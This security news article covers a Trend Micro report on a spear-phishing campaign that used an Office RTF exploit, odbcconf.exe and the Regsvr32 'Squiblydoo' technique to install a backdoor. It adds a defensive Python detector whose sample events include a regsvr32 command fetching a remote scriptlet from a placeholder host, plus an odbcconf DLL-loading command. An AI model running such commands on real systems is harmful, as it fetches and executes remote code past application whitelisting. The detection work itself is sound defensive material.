Trend Micro warns that an email campaign first observed a couple of months ago is currently targeting Russian-speaking enterprises and delivering a new Windows-based backdoor.
The campaign combines an Office exploit with several legitimate Windows components to run malicious scripts, an approach intended to make detection and blocking more difficult.
Starting from the first sample tied to the campaign, the researchers registered five spam runs between June 23 and July 27, 2017. According to Trend Micro, the campaign is still active and is targeting financial institutions and mining firms.
Trend Micro's experts point out that the attackers diversified their tactics by sending different, targeted emails in each run. Given the emails' limited distribution and the specificity of the social engineering lures, the researchers consider this a spear-phishing campaign.
The spam emails pose as invoices from sales and billing departments and carry a malformed Rich Text Format (RTF) file that exploits CVE-2017-0199, a vulnerability in Microsoft Office's Windows Object Linking and Embedding (OLE) interface that Microsoft patched in April 2017.
The exploit ultimately drops a DLL that is loaded through odbcconf.exe, a legitimate Windows utility for configuring ODBC drivers. The DLL in turn launches the Regsvr32 (Microsoft Register Server) command-line utility with specific parameters (the usual form is regsvr32 /s /n /u /i:<URL of a scriptlet> scrobj.dll). This method is known as Squiblydoo: it abuses Regsvr32, a signed Microsoft binary, to fetch and execute a remote scriptlet, bypassing restrictions on running scripts and evading application whitelisting protections such as AppLocker.
“While Squiblydoo is already a known attack vector, this is the first time we’ve seen it combined with odbcconf.exe,” Trend Micro says.
The scriptlet then downloads another XML file from the domain wecloud[.]biz, again through the Regsvr32-abusing Squiblydoo technique; this second file is the main backdoor used in the attack.
Depending on the commands it receives, the backdoor can download and execute Portable Executable (PE) files, run shell commands, download additional scripts, delete files and startup entries, or launch a new script and terminate the current one.
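The two living-off-the-land steps described above (odbcconf.exe loading a DLL, and Regsvr32 pulling a remote scriptlet via Squiblydoo) leave a distinctive trail in process-creation telemetry. The following is an added example written for this article, not code from Trend Micro's report or from the malware: a small Python detector that scans process-creation events (the shape of a Sysmon Event ID 1 record or EDR export) for those two patterns and raises the severity when the parent is an Office application, which matches this campaign's entry vector. The event field names, hostnames, file paths and PIDs are constructed for the example and are not real indicators from the campaign; the odbcconf /a {REGSVR ...} and /f <response file> forms are the documented ways that utility loads a DLL.

```python
import re
from dataclasses import dataclass

# Office processes that should never spawn regsvr32/odbcconf; the campaign's
# entry point is an Office exploit, so this parent relationship is the strongest signal.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Squiblydoo: regsvr32 /s /n /u /i:<scriptlet URL or path> scrobj.dll
RE_REGSVR32_I = re.compile(r'/i:\s*(?P<target>"[^"]+"|\S+)', re.IGNORECASE)
RE_SCROBJ = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)
RE_URL = re.compile(r"^https?://", re.IGNORECASE)
# odbcconf.exe /a {REGSVR <dll>} or /f <response file> loads a DLL via a signed Windows binary
RE_ODBCCONF_REGSVR = re.compile(r"/a\s*\{\s*regsvr\s+(?P<dll>[^}]+)\}", re.IGNORECASE)
RE_ODBCCONF_RSP = re.compile(r"/f\s+(?P<rsp>\S+)", re.IGNORECASE)

# Constructed sample telemetry (hypothetical hosts, paths and PIDs; not real IOCs).
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://stage.example.invalid/a.sct scrobj.dll"},
    {"pid": 4188, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r"odbcconf.exe /a {REGSVR C:\Users\Public\loader.dll}"},
    # Benign: an installer registering its own COM DLL, no /i: and no scrobj.dll.
    {"pid": 5001, "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendorctl.dll"'},
    # Benign: odbcconf used for its intended purpose (creating a system DSN).
    {"pid": 5077, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r'odbcconf.exe /a {CONFIGSYSDSN "SQL Server" "DSN=Reporting"}'},
]


@dataclass
class Finding:
    pid: int
    technique: str
    severity: str
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: dict) -> list:
    """Return the Findings for one process-creation event (empty list if benign)."""
    image = _basename(ev["image"])
    parent = _basename(ev.get("parent_image", ""))
    cmd = ev["cmdline"]
    findings = []

    if image == "regsvr32.exe":
        m = RE_REGSVR32_I.search(cmd)
        # Both the /i: argument and scrobj.dll are needed for the scriptlet trick.
        if m and RE_SCROBJ.search(cmd):
            target = m.group("target").strip('"')
            if RE_URL.match(target):
                findings.append(Finding(ev["pid"], "squiblydoo-remote", "high",
                                        f"regsvr32 loading scriptlet from {target}"))
            else:
                findings.append(Finding(ev["pid"], "squiblydoo-local", "medium",
                                        f"regsvr32 loading local scriptlet {target}"))
    elif image == "odbcconf.exe":
        m = RE_ODBCCONF_REGSVR.search(cmd)
        if m:
            findings.append(Finding(ev["pid"], "odbcconf-regsvr", "medium",
                                    f"odbcconf registering DLL {m.group('dll').strip()}"))
        else:
            m = RE_ODBCCONF_RSP.search(cmd)
            if m:
                findings.append(Finding(ev["pid"], "odbcconf-rsp", "medium",
                                        f"odbcconf executing response file {m.group('rsp')}"))

    # Escalate anything spawned directly by an Office application.
    if findings and parent in OFFICE_PARENTS:
        for f in findings:
            f.severity = "critical"
            f.detail += f" (spawned by {parent})"
    return findings


def scan(events) -> list:
    """Run analyze_event over a sequence of events and flatten the results."""
    return [f for ev in events for f in analyze_event(ev)]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] pid={f.pid} {f.technique}: {f.detail}")
```

Run against the constructed events, the detector flags the Office-spawned regsvr32 scriptlet load as critical and the odbcconf DLL registration as medium, and leaves the two legitimate uses alone. In production the same rules belong in the SIEM or EDR query language, and the local-scriptlet case should not be ignored: an attacker who first drops the .sct to disk produces no URL in the command line but still abuses the same scrobj.dll code path.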
According to experts from Trend Micro, “While the later stages of the infection chain required the use of various Windows components, the entry point still involves the use of a Microsoft Office exploit. Patching and keeping software up-to-date will protect users. Alternately, employing firewalls, intrusion detection and prevention systems, virtual patching, and URL categorization, as well as enforcing robust patch management policies, will significantly reduce the system’s attack surface.”